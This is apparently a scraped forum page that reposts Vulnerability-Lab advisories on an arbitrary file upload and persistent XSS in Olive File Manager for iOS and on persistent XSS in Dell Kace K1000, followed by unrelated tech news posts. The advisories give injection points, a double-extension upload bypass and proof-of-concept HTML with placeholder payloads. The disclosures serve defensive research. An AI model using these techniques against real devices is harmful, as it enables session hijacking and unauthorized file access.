Status: 404[Not Found] GET http://192.168.2.104:41495/%3C/a Load Flags[LOAD_DOCUMENT_URI ] Content Size[0] Mime Type[application/x-unknown-content-type] Request Headers: Host[192.168.2.104:41495] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05: 48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200] Connection[keep-alive] Response Headers: Accept-Ranges[bytes] Content-Length[0] Date[Thu, 11 Jul 2013 18:14:34 GMT] Solution: ========= To fix the vulnerability parse the add folder name input field and restrict it but also cleanup the affected listing module with the output. Risk: ===== The security risk of the persistent input validation web vulnerability is estimated as high(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
  19. Description : Olive File Manager version 1.0.1 for iOS suffers from arbitrary file upload and cross site scripting vulnerabilities. Author : enjamin Kunz Mejri Source : Olive File Manager 1.0.1 Arbitrary File Upload / XSS ? Packet Storm Code : Title: ====== Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities Date: ===== 2013-07-13 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1009 VL-ID: ===== 1009 Common Vulnerability Scoring System: ==================================== 5.6 Introduction: ============= A powerful file manager and well-designed office suit. Multiple features all in one app, coming with new functions every 2 weeks! These are all in Olive File Manager! Once you have it, ask for nothing else! Powerful file manager: Retain your use habits with PC file manager such as copy and paste. Capable of opening documents like mail attachments from other apps. Support for multiple display mode(e.g. list, thumbnail, grid), sending documents as mail attachments, screening display, sorting and searching documents, etc. A wireless USB flash disk A compressing & decompressing tool An encrypted safe box An e-book reader A GoogleDocs terminal A Dropbox terminal A picture viewer A music player A video player Office Suite: Multiple formats supports available, including doc, docs, xls, xlsx, ppt, pptx, pdf, txt, rtf, html, iwork, etc. Wireless USB flash disk: This enables you to transfer your files from your USB disk to your iPad through WIFI. Compressing & decompressing: Support for decompression and package compression for .zip and .rar files. Encrypted safe box: You can set a password on your Olive File Manager and never need to worry about your documents being exposed when someone is playing your iPad. Cloud: GoogleDocs and Dropbox supports are available with the function of synchronous upload and download of files(More Cloud supports are under development). Picture Viewer: Support for common image formats such as .png, .bmp and .jpg. Music & Video Player: Support for common video formats including MP3, AAC, 3GP, avi, au, wav, MP4, mov and m4a (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/olive-file-manager/id529493702 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). Report-Timeline: ================ 2013-07-13: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Apple AppStore Product: Olive File Manager Wifi 1.0.1 Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== 1.1 A local file include and arbitrary file upload web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on application-side of the service. The vulnerability is located in the file upload/add module of the web-server (http://localhost:8797/) when processing to request a manipulated filename via POST. The injected file will be accessable via the index listing module of the web application. Remote attackers can exchange the filename with a double or tripple extension bia POST method to bypass the upload validation and filter process. After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php codes. A persistent script code injection is detected in the filename parameter. Attackers can tamper the request and exchange the file name with persistent malicious script code or tags. The code will be executed in the main index site when processing to list the object (file) items. Attackers are also able to inject persistent code with local frame requests to unauthorized access application data/apps or restricted application information. The execution of the persistent code also occurs when an application user is processing to refresh, update or delete the malicious web context. Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload. Vulnerable Application(s): [+] Olive File Manager v1.0.1 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload (Web Server) [Remote] Vulnerable File(s): [+] AirDriveAction_file_add Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Application Index File Listing (http://localhost:8797/) 1.2 A persistent input validation web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app. The vulnerability is located in the index file dir listing module of the web-server (http://localhost:8797/) when processing to display via POST request method injected manipulated `folder names`. The persistent script code will be executed in the main index file dir listing module when the service lists the new malicious injected foldername as item. Exploitation of the persistent web vulnerability requires low or medium user interaction without application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] Olive File Manager v1.0.1 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Add Folder Vulnerable Parameter(s): [+] foldername Affected Module(s): [+] Index Folder Listing (http://localhost:8797/) Proof of Concept: ================= 1.1 The file include and arbitrary file upload vulnerability can be exploited by remote attackers without privilege application user account and without required user interaction. For demonstration or reproduce ... PoC: Filename <div class="file_list_container"><div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="..">..</a> </td></tr></tbody></table></div><div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="<[LOCAL FILE/PATH REQUEST!]"></a> (Size:27,27 Kb, Last Modified:2013-07-12 18:34:15)<br /> </td></tr></tbody></table></div><div class="file_list_item"><table width="100%" height="50px" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td width="50" align="center" valign="middle"></td><td width="*" align="left" valign="middle"><a href=">">[LOCAL FILE/PATH REQUEST!]></a> (Size:27,27 Kb, Last Modified:2013-07-12 18:33:42)<br /> </td></tr></tbody></table></div></div></div><div class="footer"><div class="footer_text">Copyright © 2008 OliveOffice,Inc. </div></div></body></html></iframe></a></td></tr></tbody></table></div></div> --- POST Method Request Log --- POST_DATA[-----------------------------151253266715950 Content-Disposition: form-data; name="file"; filename=">"[LOCAL FILE/PATH REQUEST!]>.png" Content-Type: image/png 1.2 the persistent input validation web vulnerability can be exploited by remote attackers without privilege application user account and with low or medium required user interaction. For demonstration or reproduce ... PoC: Foldername <div class="file_list_container"><div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="..">..</a> </td></tr></tbody></table></div><div class="file_list_item"><table height="50px" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr><td align="center" valign="middle" width="50"></td><td align="left" valign="middle" width="*"><a href="%20[PERSISTENT INJECTED SCRIPT CODE!]>" <[PERSISTENT INJECTED SCRIPT CODE!]">/">%20> "<[PERSISTENT INJECTED SCRIPT CODE!]">/</a> (Size:0 Kb, Last Modified:2013-07-12 18:26:31)<br /> </td></tr></tbody></table></div></div></div><div class="footer"><div class="footer_text">Copyright © 2008 OliveOffice,Inc. </div></div></body></html></iframe></a></td></tr></tbody></table></div></div> Solution: ========= 1.1 The arbitrary file upload web vulnerability and the upload filter bypass issue is estimated as high(+). 1.2 The security risk of the persistent input validation vulnerabilities is estimated as high(-). Risk: ===== The security risk of the persistent input validation web vulnerability is estimated as high(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
  20. Description : Dell Kace 1000 SMA version 5.4.70402 suffers from multiple cross site scripting vulnerabilities. Author : Ibrahim El-Sayed Source : Dell Kace 1000 SMA 5.4.70402 Cross Site Scripting ? Packet Storm Code : Title: ====== Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities Date: ===== 2013-07-16 References: =========== http://www.vulnerability-lab.com/get_content.php?id=833 VL-ID: ===== 833 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= Dell KACE is to provide an appliance-based approach to systems management, to create time for systems administration professionals, while saving money for their companies. Dell KACE Systems Management Appliances are available as both physical and virtual appliances. The KACE Management Appliance delivers a fully integrated systems management solution, unlike traditional software approaches that can require complex and time-consuming deployment and maintenance. KACE accomplishes this via an extremely flexible, intelligent appliance-based architecture that typically deploys in days and is self maintaining. The KACE Management Appliance also provides direct access to time-saving ITNinja systems management community information using AppDeploy Live, the leading destination for end point administrators. The result: Comprehensive systems management that is easy-to-use and that can be more economical than software only alternatives. Read more in the white paper KACE K1000 Management Appliance Architecture: Harnessing the Power of an Appliance-based Architecture. The KACE Management Appliance is designed for enterprises and business units with up to 20,000 nodes. (Copy of the Vendor Homepage: http://www.kace.com/products/systems-management-appliance ) Abstract: ========= The Vulnerability Laboratory Research Team discovered a web session vulnerability in Dell Kace K1000, Systems Management Appliance. Report-Timeline: ================ 2013-01-24: Researcher Notification & Coordination 2013-02-06: Vendor Notification 2013-02-08: Vendor Response/Feedback 2013-**-**: Vendor Fix/Patch 2013-07-16: Public Disclosure Status: ======== Published Affected Products: ================== DELL Product: Kace K1000 SMA 5.4.70402 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== Multiple persistent input validation web vulnerabilities are detected in Dell Kace K1000, Systems Management Appliance. The vulnerabilityallows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). The first vulnerability is located in the `Inventory` module with the bound vulnerable Ip-address, Mac, Os Name, Service pack, Notes and Label Name parameters. The persistent injected script code will be executed directly out of the `Computer` listing when processing to manage the earlier inserted machines in dbms context. The second vulnerability is located in the `Distribution` module with the bound vulnerable Machine Name and Mac address parameters. The persistent injected script code will be executed directly out of the `Walk-on-lan` exception handling mechanism when a malicious data is inserted in the vulnerable fields. Successful exploitation of the vulnerabilities result in persistent session hijacking, persistent phishing, persistent external redirects, persistent external malware loads via inject and persistent vulnerable module web context manipulation. Vulnerable Section(s): [+] Inventory => Computers [+] Inventory => Computers [+] Distribution => Wake-on-lan Vulnerable Module(s): [+] Add New Item [+] Add Label [+] Add new Item Vulnerable Parameter(s): [+] [Ip-address] [Mac] [Os Name] [Service pack] [Notes] [+] [Label Name] [+] [Machine Name] [Mac address] Affected Modules(s): [+] Inventory => Computers [+] Inventory => Computers => Choose Action Menu => Apply label [+] Distribution => Wake-on-lan =>Exception handeling Proof of Concept: ================= The vulnerability can be exploited by remote attackers with low user interaction and low privilege application user account. For demonstration or reproduce ... 1.1 URL: https://pub23.127.0.0.1:1336/adminui/machine.php?ID=1 Affected Module: Inventory => Computers Code Review: <div style="margin-left:15px; color: #005FA9; font-family:Verdana,Arial,Helvetica,sans-serif; font-size:10px; font-weight:300;"> <script type="text/javascript" src="/common/js/scw.js"></script> <script type="text/javascript"> // this will get set at the end of the page, after we've generated all the dynamic sections var gLastSectionId = 0; </script> [<a href="#" onclick='expandAllDetail(gLastSectionId, 1);'>Expand All</a>] [<a href="#" onclick='expandAllDetail (gLastSectionId);printSpecial()'>Printer Friendly Version</a>] [<a href="history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME= Computer&TYPE_ID=8&NAME=%26lt%3Bh1%26gt%3BName%26lt%3B%2Fh1%26gt%3B&SHOW_ALL=1" onclick='logPopup(this); return false;'>Show All History</a>] <div id="printReady" style="margin-top:2px;"> <table border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse;width:70%;"> <tbody> <tr class="detail_page_section_heading_no_cursor"> <td colspan="3"> <a style="cursor: pointer;cursor: hand;" onclick="hideShowDetail('section1',null,'','',''); return false;">Summary</a> </td> </tr> </tbody> <tbody id="section1" style="display:none;"> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min- width:100px;">Name:</td><td><h1>Name</h1></td></tr> <tr valign="top" class="rowData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">Manual Entry:</td><td>Manually Entered Record, no communication with the server [<a href="/adminui/machine_edit.php?ID=2">Edit</a>]</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">IP Address:</td><td>[PERSISTENT INJECTED SCRIPT CODE!] <select onchange=" if(this.options[this.selectedIndex].value=='1') MachineAction('<h1>Ip-Address</h1>','<h1>Name</h1>', 2, encodeURI('mstsc.exe /v:KACE_HOST_IP /w:900 /h:800'));"> <option value="">Action...</option><option title="Launch: mstsc.exe /v:KACE_HOST_IP /w:900 /h:800" value="1">Action 1</option></select></td></tr> <tr valign="top" class="rowData"><td width="1%"> </td><td style="width:150px;min-width:100px;">MAC:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td> </tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;"> Processors:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowData"><td width="1%"> </td><td style="width:150px; min-width:100px;">OS Name:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]v</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">Service Pack:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowData"> <td width="1%"> </td><td style="width:150px;min-width:100px;">Notes:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;">Record Created:</td><td>01/28/2013 05:31:49</td></tr> <tr class="rowData"><td colspan="3"> </td></tr> </tbody><tbody><tr class="detail_page_group_heading"><td colspan="3">Inventory Information </td></tr></tbody> <tbody> <tr class="detail_page_section_heading_no_cursor"> <td colspan="3"> <a style="cursor: pointer;cursor: hand;" onclick="hideShowDetail('section2',null,'','',''); return false;">Hardware</a> <span style="color:#909090"> [no changes]</span> </td> </tr> </tbody> <tbody id="section2" style="display:none;"> <tr valign="top" class="rowHighlightData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">Processors:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowData"><td width="1%"> </td><td style="width:150px;min-width:100px;">CD/DVD Drives:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;"> Sound Devices:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowData"><td width="1%"> </td> <td style="width:150px;min-width:100px;">Video Controllers:</td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr valign="top" class="rowHighlightData"><td width="1%"> </td><td style="width:150px;min-width:100px;">Monitor: </td><td>[PERSISTENT INJECTED SCRIPT CODE!]</td></tr> <tr class="rowData"><td colspan="3"> </td></tr> </tbody><tbody> <tr class="detail_page_section_heading_no_cursor"> <td colspan="3"> <a style="cursor: pointer;cursor: hand;" onclick="hideShowDetail ('section3',null,'','',''); return false;">Printers (1)</a> </td> ... 1.2 URL:https://pub23.127.0.0.1:1336/adminui/computer_inventory.php Affected Module: Inventory =>Computers => choose action => Apply Label Code Review: <td class="inputFormat"><select name="FINDFIELDS[EXP_SELECT8]" id="FINDFIELDS[EXP_SELECT8]" onchange="$('FINDFIELDS[INPUT8]').disabled = ($F(this) == 'NULL' || $F(this) == 'NOT_NULL')" style="width:auto"> <option value="NOT_EQUAL" title="!=">!= </option> <option value="GT" title=">">></option> <option value="LT" title="<"><</option> <option value="EQUALS" title="=">=</option> <option value="BEGINS_WITH" title="begins with">begins with</option> <option value="CONTAINS" title="contains">contains</option> <option value="NOT_BEGINS_WITH" title="does not begin with">does not begin with</option> <option value="NO_CONTAIN" title="does not contain">does not contain</option> <option value="NOT_ENDS_WITH" title="does not end with">does not end with</option> <option value="NOT_MATCH_REGEX" title="does not match REGEX">does not match REGEX</option> <option value="ENDS_WITH" title="ends with">ends with</option> <option value="NOT_NULL" title=" is NOT NULL">is NOT NULL</option> <option value="NULL" title="is NULL">is NULL</option> <option value="MATCH_REGEX" title="matches REGEX">matches REGEX</option> </select> </td> <td class="inputFormat"><input class="inputFormat" name="FINDFIELDS[INPUT8]" id="FINDFIELDS[INPUT8]" value="" size="46" maxlength="255" /></td> </tr> <tr> <td colspan="4" align="center" class="inputFormat"> Choose label: <select name="FINDFIELDS[FILTER_LABEL]" dojoType="dijit.form.ComboBox"> <script type="dojo/connect"> this.attr("value","");</script> <option selected value="" title=""></option> <option value="77" title="">[PERSISTENT INJECTED SCRIPT CODE!]" >">[PERSISTENT INJECTED SCRIPT CODE!]</option> </select> <input name="test_filter" class="inputFormatButton" type="submit" value="Test Smart Label" /> <input name="create_filter" class="inputFormatButton" type="submit" value="Create Smart Label" /> <input name="cancel" class="inputFormatButton" type="reset" value="Reset" onclick="document.createFilterForm.reset(); return true;" /> </td> </tr> </table> </form> </div> </div> <div id="createNotifyForm" class="advQueryOuter"> <div class="advQueryInner"> <h2>Create Email Notification</h2> <p>To create a notification rule simply enter the search criteria, title, email recipient - then Test & Create:</p> <form name="createNotifyForm" action="/adminui/advanced_query.php" method="post" onreset="fieldsReset(); fieldsOnchange();"> <table border="0" cellspacing="0" cellpadding="0" style="margin-left: auto; margin-right: auto;" align="center"> <tr> ... 1.3 URL: https://pub23.127.0.0.1:1336/adminui/settings_network_scan.php Affected module: Distribution => Wake-on Lan => Exception handeling Code Review: <p> <b><u>Wake-on-LAN</u></b> <br/><br/> This page allows you to wake up a computer or other device that has been inventoried by the K1000 if the remote device is attached to the network and supports Wake-on-LAN. If the device you wish to wake is not inventoried by the K1000 but you still know the MAC (Hardware) address and its last-known IP address, you can manually enter the info to wake the device. </p> <div class="roundbottom"> <img src="./images/RoundRectBottomLeft.gif" alt="" width="15" height="15" class="corner" style="display: none;"> </div> </div> <span class="filtercount" style="display:none" id="hidden_machine_picker_count"></span> <span class="filtercount" style="display:none " id="hidden_device_picker_count"></span> <form class="edit" action="" method="post" target="_self" /> <div class="wordwrap messageBox"> <span class="messageBoxTitle">Please correct the following errors:</span><ul><li class="error">A Wake-on-LAN packet was sent to wake <strong>[PERSISTENT INJECTED SCRIPT CODE!] ([PERSISTENT INJECTED SCRIPT CODE!])</strong>. </li><li class="error">Please note that it may take several minutes for the device to power on and be available for use.</li></ul></div> <table cellspacing="1" cellpadding="0" border="0"> <tr> <td colspan="2" class="inputFormat"><h2>Wake Multiple Devices</h2></td> </tr> <tr> <td class="inputFormat" style="width: 30%; vertical-align:middle;">Limit To Selected Labels:</td> <td width="70%"> <select name="label" style="width: 30em" onchange="updateFields(this)" id="label"> <option selected value="" title="Select a label…">Select a label…</option> <option value="77" title="">[PERSISTENT INJECTED SCRIPT CODE!]">">[PERSISTENT INJECTED SCRIPT CODE!]</option> <option value="72" title="Adobe Flash Player">Adobe Flash Player</option> <option value="71" title="Adobe Reader X">Adobe Reader X</option> <option value="49" title="All Ticket Owners">All Ticket Owners</option> <option value="33" title="MemberOfBuildingA">MemberOfBuildingA</option> <option value="32" title="MemberOfFinanceGroup">MemberOfFinanceGroup</option> <option value="64" title="Windows 7 - Critical - 2012">Windows 7 - Critical - 2012</option> <option value="65" title="Windows XP - Critical - 2012">Windows XP - Critical - 2012</option> </select> </td> </tr> <tr> <td colspan="2" class="inputFormat"><img src="/adminui/images/timer_16x16.gif" alt="" height="16" width="16" border="0" /> <a href="wol_list.php">Schedule a routine Wake-on-LAN event</a></td> </tr> <tr> <td colspan="2" height="10px"></td> </tr> <tr> <td colspan="2" class="inputFormat"><h2>Wake a Computer</h2></td> </tr> <tr> <td class="inputFormat" style="width: 140px; max-width: 140px; vertical-align:middle;">Limit To Listed Machines:</td> <td> <select name="machine[]" size="7" multiple="1" id="machine[]" style="width:30em"> <option value="0" title="----- Machine Names -----">----- Machine Names -----</option> </select> <input class="inputFormat" type="button" value="Remove" onclick="machineRemoveSelected()" /> <input class="inputFormat" type="button" value="Remove All" onclick="machineRemoveAll()" /> </td> </tr> <tr> <td height="10px"></td> <td valign="bottom"> <select name="" id="machine_picker" style="width:30em" onchange="machineAddNameToList(this); this.selectedIndex = 0; "> <option value="" title="Loading...">Loading...</option> </select> Risk: ===== The security risk of the persistent input validation web vulnerabilities are estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Ibrahim Mosaad El-Sayed [ibrahim@evolution-sec.com] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
  21. Analysis A senior bod behind LibreOffice says the open-source suite's spreadsheet app lags behind much-nippier rival Microsoft Excel - but the hardware acceleration announced this month should close that gap. And that acceleration could give the freely available productivity suite a leg up on tablets, smartphones and other mobile gadgets, too. As reported earlier this month, LibreOffice will be updated to hook into AMD's HSA technology: this grants graphics chips access to memory allocated to applications, allowing the hardware to easily and rapidly crunch through program data while the system's general-purpose processors work on other things. Ultimately, HSA-aware software should run faster, provided suitable silicon is present, by offloading work onto the graphics processor, which may otherwise be sitting mostly idle. Last week, LibreOffice maker the Document Foundation admitted AMD to its ranks of advisory board members; other bedfellows include Intel, Red Hat, SuSE and Google. Version 4.2 of the suite, due out in February next year, should support the GPU-powered acceleration thanks to contributions from AMD engineers and others. “Spreadsheet has traditionally been pretty weak in LibreOffice from a performance and memory perspective. We want to fix that and make it really good,” Document Foundation board member, SuSE staffer and Linux desktop architect Michael Meeks told The Reg. “We have had a performance gap with Microsoft in the past and we are eager to close that. “People build spreadsheets to crunch data to the point of boredom - bigger and bigger and slower and slower. We can make a tool that’s bigger and let them crunch more data in rich ways." Once on a par with Excel, at least in terms of speed and memory use, LibreOffice can hope to attract that hard-to-catch beast: the desktop spreadsheet power user, traditionally a Microsoft Office animal. The open-source suite's spreadsheet app is undergoing “huge structural changes”, we're told, with code rewritten and with systematic unit testing. “That should put us back in the spreadsheet game in my view,” Meeks reckoned. But isn’t the spreadsheet war over, and didn’t Microsoft win with Excel? “There are loads of ways to put us back in the spreadsheet game, in my view,” said Meeks. One such way, perhaps, is getting the gear onto smaller devices, such as tablets, whose popularity is mushrooming. The aforementioned hardware acceleration could give heavyweight LibreOffice an edge on trendy handheld gear as well as boring old PCs: a coalition of tech firms including AMD, ARM, Qualcomm, Texas Instruments and Samsung are part of the non-profit HSA Foundation, which is working on an open specification for the GPU-CPU sharing technology on a wide-range of fondleslabs and other systems. HSA-aware code is written in a new platform-independent language called HSAIL, which runs in a virtual machine and thus allows a program to comfortably target a host of compatible HSA hardware. Given the number of mobile processor designers and manufacturers in AMD's foundation, hardware acceleration for mobile gear is on the cards. ARM ports of LibreOffice do exist, but these are targeted at mini-beasts such as the Raspberry Pi. For handhelds, Android and iOS ports of LibreOffice are being worked on, but they are still at a preliminary stage – as is a browser version of the suite: a HTML5 version was first discussed in 2011. The Document Foundation needs cash to finish that off as well as someone to provide the servers on which the backend of the web version runs. There’s just two modes for the Android and iOS ports – viewer and full-office suite - and there’s some initial touchscreen support with pan and zoom and minimal editing. Meeks concedes there are “formidable user interface problems around touch”, adding that with a “couple of people” and a partner to fund the work it would be done “in a couple of months”. One big problem remains, however: the full LibreOffice suite, at 50MB, is currently too big for download to mobile, realistically. 'We have a long way to go but we are getting there' It’s been two and a half years since LibreOffice was formed in a fork from the Oracle-controlled OpenOffice, and the Document Foundation has been concentrating on the basics ever since: fixing bugs and ripping out old code gone to seed. The latest version, 4.0 released in February, had better handling of file formats and improved interoperability with Microsoft Office; 275 out of 500 dialogue boxes were cleaned up; and thousands of unused methods and code resembling ASCII art were thrown out. In fact, nine million new lines of code were added to 4.0, and 12 million taken out, we're told. (It has about seven million lines of code under version control as of right now.) Up to 15,000 quality assurance tests have been run on the new code to detect any crash-causing scenarios. “There was a huge build up of technical debt in the code base and people would do appalling hacks to avoid re-factoring and doing it right," said Meeks. "We are finally starting to do things right ... these days we are doing more exhaustive changes and we hope to get it right with more manageable code in the long term. “In the past there was this fear of breaking things that were culturally engrained. Now, there’s a nuanced view that if you break something perhaps that’s good because you need to change something. I think people enjoy this level of code clean up, it's satisfying. We write unit tests to limit the breaks.” There will come a point at which the changes to LibreOffice become so significant that the suite will no longer simply be an OpenOffice fork. That time will come soon, judging by raw numbers and momentum. Black Duck’s Ohloh developer-monitoring service counts 350 programmers and 20,700 code commits for LibreOffice over the last 12 months, versus 50 devs and 4,900 commits for OpenOffice. Also, OpenOffice's source code is released under an Apache Software Foundation (ASF) licence while LibreOffice is available under the GNU LGPL; Apache won’t accept code contributions from non-ASF licences, meaning OpenOffice is cut off from LibreOffice's changes. “It’s clearly a similar code base – these are members of the same family, and for a long time they will have to be like that,” said Meeks. The new and improved code should dovetail into these grander plans to speed up the software, reduce its footprint, and make it easier to update for more platforms in the future. Will LibreOffice finally offer something credible to Microsoft Office? We've been down this route too many times to do anything other than roll our eyes, at least at this stage. Smartphones, tablets and browser-based suites have everything to play for as the traditional desktop gets left behind. (But don't forget Microsoft Office is coming to iPhones, iPads and iPods, as well as Redmond's Surface tablets.) One thing is certain, however: with so much going on, LibreOffice will look less like OpenOffice. And it won't necessarily be the big platform stuff that will transform LibreOffice. It's the state of the code inside. “We have a long way to go but we are getting there and that’s encouraging,” Meeks said of tidying up, refactoring and testing. Still, there is excitement surrounding even the smallest changes; something that's much better than the last days of the OpenOffice Empire under the moribund Sun Microsystems, and later Oracle. “You wake up and you are excited. It’s much better than it was,” said Meeks. Sursa TheRegister.co.uk
  22. INTERNET PORTAL Yahoo is letting people grab expired usernames on its service, meaning that if you want it and missed out the first time, you can stake a claim on something like dave@yahoo.com. Last month the firm announced that it would make usernames that have not been used in the last 12 months available to anyone that wants them. "We're freeing up [user] IDs, that have been inactive for at least 12 months, by resetting them and giving them a fresh start. In mid July, anyone can have a shot at scoring the Yahoo ID they want," said the firm in mid-June. "In mid-August, users who staked a claim on certain IDs can come to Yahoo to discover which one they got." Well, now it's mid-July and the firm is letting punters stake their claims. "Last month, we told you about being able to grab the Yahoo username of your dreams, where the first step was letting people keep their account by logging in if they hadn't in the past year," said Dylan Casey, senior director for platforms at Yahoo. "That part is over, so it's time for you to start filling out your wish list." We had a go. You can choose as many as five different names and will be notified of any success in mid-August. Yahoo said that it will work with social media websites, or anywhere where it's email addresses might be used, to ensure that the new owners will have the correct levels of access. Sursa TheInquirer.net
  23. LSI has begun shipping its first 12Gbps SAS adapters for storage arrays, servers and workstations, doubling the prevailing 6Gbps SAS data rate. LSI's SAS 9300 HBA (Host Bus Adapter) runs at 12Gbit/sec, delivers over 1 million IOPS through a PCIe 3.0 connection to hosts, and comes in four versions : 9300-8e with 8 ports 9300-8i with 8 ports 9300-4i4e with 8 ports 9300-4i with 4 ports Maximum throughput is claimed to be more than 6GB/sec when streaming. Each HBA uses either an LSI SAS 3008 or 3004 controller, has the SAS 3.0 standard-specified mini-SAS HD connectors and their low-profile form factor supports 8 PCIe 3.0 lanes. Page 6 of LSI's Storage Adapter Guide (pdf) lists various characteristics of the 8i, 8e, 4i-4e, and 4i models. We envisage that LSI will bring out a 12Gbit/s SAS switch to follow on from its 6160 SAS 2.0 switch product. LSI SAS 9300 HBA which runs at 12Gbit/s Pricing starts from $245 for a single 9300-4i and all the products are available now. If your apps are hung up on 6gig SAS connectors not being fast enough, then here's one route out of that trap. Sursa TheRegister.co.uk
×
×
  • Create New...